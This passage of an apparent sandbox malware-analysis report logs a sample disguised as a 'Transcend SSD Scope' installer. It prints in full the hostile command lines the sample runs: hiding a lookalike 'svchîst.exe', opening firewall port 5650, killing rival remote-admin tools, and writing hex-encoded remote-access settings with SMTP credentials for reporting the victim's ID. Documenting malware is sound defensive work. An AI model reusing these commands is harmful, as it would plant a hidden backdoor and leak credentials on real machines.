N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1964 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 1388 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1388 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1388 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1388 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1388 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1388 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1388 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1388 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1964 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 1964 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 1964 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 1964 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 1964 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 1964 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 1964 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 952 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2032 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp
PID 2032 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp
PID 2032 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp
PID 2032 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp
PID 2032 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp
PID 2032 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp
PID 2032 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp
PID 952 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 952 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 952 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 952 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 952 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 952 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 952 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 952 wrote to memory of 2036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 952 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 952 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 952 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 952 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 952 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 952 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 952 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1124 wrote to memory of 548 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1124 wrote to memory of 548 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1124 wrote to memory of 548 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1124 wrote to memory of 548 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1124 wrote to memory of 1504 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1124 wrote to memory of 1504 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1124 wrote to memory of 1504 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe

"C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f

C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

"C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp" /SL5="$201A8,2911413,332288,C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe"

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening TCP 5650 "Open Port 5650"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650

C:\Windows\SysWOW64\drivers\install.exe

"C:\Windows\System32\drivers\install.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413